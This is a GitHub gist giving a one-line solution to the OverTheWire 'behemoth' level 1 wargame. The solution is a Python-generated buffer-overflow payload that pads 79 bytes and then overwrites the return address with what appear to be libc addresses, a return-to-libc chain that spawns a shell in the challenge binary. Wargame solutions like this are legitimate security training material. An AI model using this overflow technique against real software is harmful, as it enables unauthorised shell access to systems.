Skip to content

Instantly share code, notes, and snippets.

@plvhx
Created September 19, 2016 12:09
Show Gist options
  • Save plvhx/8234df9ed49bc013607614e134511d48 to your computer and use it in GitHub Desktop.
Save plvhx/8234df9ed49bc013607614e134511d48 to your computer and use it in GitHub Desktop.
overthewire.org behemoth level1
(python -c 'from struct import pack;print "\x41"*(67 + 12) + pack("<I", 0xf7e61e70) + pack("<I", 0xf7e54f50) + pack("<I", 0xf7f7fa8c)' 2> /dev/null; tee) | ./behemoth1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment